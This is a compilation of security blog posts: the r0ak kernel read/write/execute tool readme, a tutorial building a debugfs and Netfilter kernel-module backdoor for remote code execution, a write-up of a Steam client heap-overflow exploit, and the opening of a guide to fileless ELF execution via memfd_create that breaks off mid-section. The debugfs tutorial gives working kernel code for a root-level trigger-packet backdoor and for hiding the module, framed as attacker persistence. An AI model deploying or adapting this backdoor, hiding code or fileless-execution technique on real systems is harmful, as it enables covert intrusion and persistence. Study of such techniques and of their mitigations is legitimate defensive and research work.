R0Ak (The Ring 0 Army Knife) — A Command Line Utility To Read/Write/Execute Ring Zero On For Windows 10 Systems

r0ak is a Windows command-line utility that enables you to easily read, write, and execute kernel-mode code (with some limitations) from the command prompt, without requiring anything else other than Administrator privileges.

Quick Peek

r0ak v1.0.0 -- Ring 0 Army Knife
http://www.github.com/ionescu007/r0ak
Copyright (c) 2018 Alex Ionescu [@aionescu]
http://www.windows-internals.com

USAGE: r0ak.exe
       [--execute <Address | module.ext!function> <Argument>]
       [--write   <Address | module.ext!function> <Value>]
       [--read    <Address | module.ext!function> <Size>]

Introduction

Motivation
The Windows kernel is a rich environment in which hundreds of drivers execute on a typical system, and where thousands of variables containing global state are present. For advanced troubleshooting, IT experts will typically use tools such as the Windows Debugger (WinDbg), SysInternals Tools, or write their own. Unfortunately, usage of these tools is getting increasingly hard, and they are themselves limited by their own access to Windows APIs and exposed features.
Some of today’s challenges include:

  • Windows 8 and later support Secure Boot, which prevents kernel debugging (including local debugging) and loading of test-signed driver code. This restricts troubleshooting tools to those that have a signed kernel-mode driver.
  • Even on systems without Secure Boot enabled, enabling local debugging or changing boot options which ease debugging capabilities will often trigger BitLocker’s recovery mode.
  • Windows 10 Anniversary Update and later include much stricter driver signature requirements, which now enforce Microsoft EV Attestation Signing. This restricts the freedom of software developers as generic «read-write-everything» drivers are frowned upon.
  • Windows 10 Spring Update now includes customer-facing options for enabling HyperVisor Code Integrity (HVCI) which further restricts allowable drivers and blacklists multiple 3rd party drivers that had «read-write-everything» capabilities due to poorly written interfaces and security risks.
  • Technologies like Supervisor Mode Execution Prevention (SMEP), Kernel Control Flow Guard (KCFG) and HVCI with Second Level Address Translation (SLAT) are making traditional Ring 0 execution ‘tricks’ obsoleted, so a new approach is needed.

In such an environment, it was clear that a simple tool which can be used as an emergency band-aid/hotfix and to quickly troubleshoot kernel/system-level issues which may be apparent by analyzing kernel state might be valuable for the community.

How it Works

Basic Architecture

r0ak works by redirecting the execution flow of the window manager’s trusted font validation checks when attempting to load a new font, by replacing the trusted font table’s comparator routine with an alternate function which schedules an executive work item (WORK_QUEUE_ITEM) stored in the input node. Then, the trusted font table’s right child (which serves as the root node) is overwritten with a named pipe’s write buffer (NP_DATA_ENTRY) in which a custom work item is stored. This item’s underlying worker function and its parameter are what will eventually be executed by a dedicated ExpWorkerThread at PASSIVE_LEVELonce a font load is attempted and the comparator routine executes, receiving the name pipe-backed parent node as its input. A real-time Event Tracing for Windows (ETW) trace event is used to receive an asynchronous notification that the work item has finished executing, which makes it safe to tear down the structures, free the kernel-mode buffers, and restore normal operation.

Supported Commands
When using the --execute option, this function and parameter are supplied by the user.
When using --write, a custom gadget is used to modify arbitrary 32-bit values anywhere in kernel memory.
When using --read, the write gadget is used to modify the system’s HSTI buffer pointer and size (N.B.: This is destructive behavior in terms of any other applications that will request the HSTI data. As this is optional Windows behavior, and this tool is meant for emergency debugging/experimentation, this loss of data was considered acceptable). Then, the HSTI Query API is used to copy back into the tool’s user-mode address space, and a hex dump is shown.
Because only built-in, Microsoft-signed, Windows functionality is used, and all called functions are part of the KCFG bitmap, there is no violation of any security checks, and no debugging flags are required, or usage of 3rd party poorly-written drivers.

FAQ

Is this a bug/vulnerability in Windows?
No. Since this tool — and the underlying technique — require a SYSTEM-level privileged token, which can only be obtained by a user running under the Administrator account, no security boundaries are being bypassed in order to achieve the effect. The behavior and utility of the tool is only possible due to the elevated/privileged security context of the Administrator account on Windows, and is understood to be a by-design behavior.

Was Microsoft notified about this behavior?
Of course! It’s important to always file security issues with Microsoft even when no violation of privileged boundaries seems to have occurred — their teams of researchers and developers might find novel vectors and ways to reach certain code paths which an external researcher may not have thought of.
As such, in November 2014, a security case was filed with the Microsoft Security Research Centre (MSRC) which responded: «[…] doesn’t fall into the scope of a security issue we would address via our traditional Security Bulletin vehicle. It […] pre-supposes admin privileges — a place where architecturally, we do not currently define a defensible security boundary. As such, we won’t be pursuing this to fix.»
Furthermore, in April 2015 at the Infiltrate conference, a talk titled Insection : AWEsomely Exploiting Shared Memory Objects was presented detailing this issue, including to Microsoft developers in attendance, which agreed this was currently out of scope of Windows’s architectural security boundaries. This is because there are literally dozens — if not more — of other ways an Administrator can read/write/execute Ring 0 memory. This tool merely allows an easy commodification of one such vector, for purposes of debugging and troubleshooting system issues.

Can’t this be packaged up as part of end-to-end attack/exploit kit?
Packaging this code up as a library would require carefully removing all interactive command-line parsing and standard output, at which point, without major rewrites, the ‘kit’ would:

  • Require the target machine to be running Windows 10 Anniversary Update x64 or later
  • Have already elevated privileges to SYSTEM
  • Require an active Internet connection with a proxy/firewall allowing access to Microsoft’s Symbol Server
  • Require the Windows SDK/WDK installed on the target machine
  • Require a sensible _NT_SYMBOL_PATH environment variable to have been configured on the target machine, and for about 15MB of symbol data to be downloaded and cached as PDB files somewhere on the disk

Attackers interested in using this particular approach — versus very many others more cross-compatible, no-SYSTEM-right-requiring techniques — likely already adapted their own code based on the Proof-of-Concept from April 2015 — more than 3 years ago.

Usage

Requirements
Due to the usage of the Windows Symbol Engine, you must have either the Windows Software Development Kit (SDK) or Windows Driver Kit (WDK) installed with the Debugging Tools for Windows. The tool will lookup your installation path automatically, and leverage the DbgHelp.dll and SymSrv.dll that are present in that directory. As these files are not re-distributable, they cannot be included with the release of the tool.
Alternatively, if you obtain these libraries on your own, you can modify the source-code to use them.
Usage of symbols requires an Internet connection, unless you have pre-cached them locally. Additionally, you should setup the _NT_SYMBOL_PATH variable pointing to an appropriate symbol server and cached location.
It is assumed that an IT Expert or other troubleshooter which apparently has a need to read/write/execute kernel memory (and has knowledge of the appropriate kernel variables to access) is already more than intimately familiar with the above setup requirements. Please do not file issues asking what the SDK is or how to set an environment variable.

Use Cases

  • Some driver leaked kernel pool? Why not call ntoskrnl.exe!ExFreePool and pass in the kernel address that’s leaking? What about an object reference? Go call ntoskrnl.exe!ObfDereferenceObject and have that cleaned up.
  • Want to dump the kernel DbgPrint log? Why not dump the internal circular buffer at ntoskrnl.exe!KdPrintCircularBuffer
  • Wondering how big the kernel stacks are on your machine? Try looking at ntoskrnl.exe!KeKernelStackSize
  • Want to dump the system call table to look for hooks? Go print out ntoskrnl.exe!KiServiceTable

These are only a few examples — all Ring 0 addresses are accepted, either by module!symbol syntax or directly passing the kernel pointer if known. The Windows Symbol Engine is used to look these up.

Limitations
The tool requires certain kernel variables and functions that are only known to exist in modern versions of Windows 10, and was only meant to work on 64-bit systems. These limitations are due to the fact that on older systems (or x86 systems), these stricter security requirements don’t exist, and as such, more traditional approaches can be used instead. This is a personal tool which I am making available, and I had no need for these older systems, where I could use a simple driver instead. That being said, this repository accepts pull requests, if anyone is interested in porting it.
Secondly, due to the use cases and my own needs, the following restrictions apply:

  • Reads — Limited to 4 GB of data at a time
  • Writes — Limited to 32-bits of data at a time
  • Executes — Limited to functions which only take 1 scalar parameter

Obviously, these limitations could be fixed by programmatically choosing a different approach, but they fit the needs of a command line tool and my use cases. Again, pull requests are accepted if others wish to contribute their own additions.
Note that all execution (including execution of the --read and --write commands) occurs in the context of a System Worker Thread at PASSIVE_LEVEL. Therefore, user-mode addresses should not be passed in as parameters/arguments.

Реклама

Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.

Картинки по запросу debugfs

Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges to go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works together when calling call_usermodehelper on it. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

In-Memory-Only ELF Execution (Without tmpfs)

In which we run a normal ELF binary on Linux without touching the filesystem (except /proc).

Introduction

Every so often, it’s handy to execute an ELF binary without touching disk. Normally, putting it somewhere under /run/user or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn’t it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting execve(2) in userland, or loading a library into another process?

Enter memfd_create(2). This handy little system call is something like malloc(3), but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in /proc/<PID>/fd/ (e.g. /proc/10766/fd/3), which, as it turns out, execve(2) will happily use to execute an ELF binary.

The manpage has the following to say on the subject of naming anonymous files:

The name supplied in name [an argument to memfd_create(2)] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.

In other words, we can give it a name (to which memfd: will be prepended), but what we call it doesn’t really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name.

Listing /proc/<PID>/fd, anonymous files look like this:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/fd
total 0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -> /memfd:kittens (deleted)
lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -> /memfd: (deleted)

Here we see two anonymous files, one named kittens and one without a name at all. The (deleted) is inaccurate and looks a bit weird but c’est la vie.

Caveats

Unless we land on target with some way to call memfd_create(2), from our initial vector (e.g. injection into a Perl or Python program with eval()), we’ll need a way to execute system calls on target. We could drop a binary to do this, but then we’ve failed to acheive fileless ELF execution. Fortunately, Perl’s syscall() solves this problem for us nicely.

We’ll also need a way to write an entire binary to the target’s memory as the contents of the anonymous file. For this, we’ll put it in the source of the script we’ll write to do the injection, but in practice pulling it down over the network is a viable alternative.

As for the binary itself, it has to be, well, a binary. Running scripts starting with #!/interpreter doesn’t seem to work.

The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target’s kernel version with uname -r.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ uname -r
4.4.0-116-generic

On Target

Aside execve(2)ing an anonymous file instead of a regular filesystem file and doing it all in Perl, there isn’t much difference from starting any other program. Let’s have a look at the system calls we’ll use.

memfd_create(2)

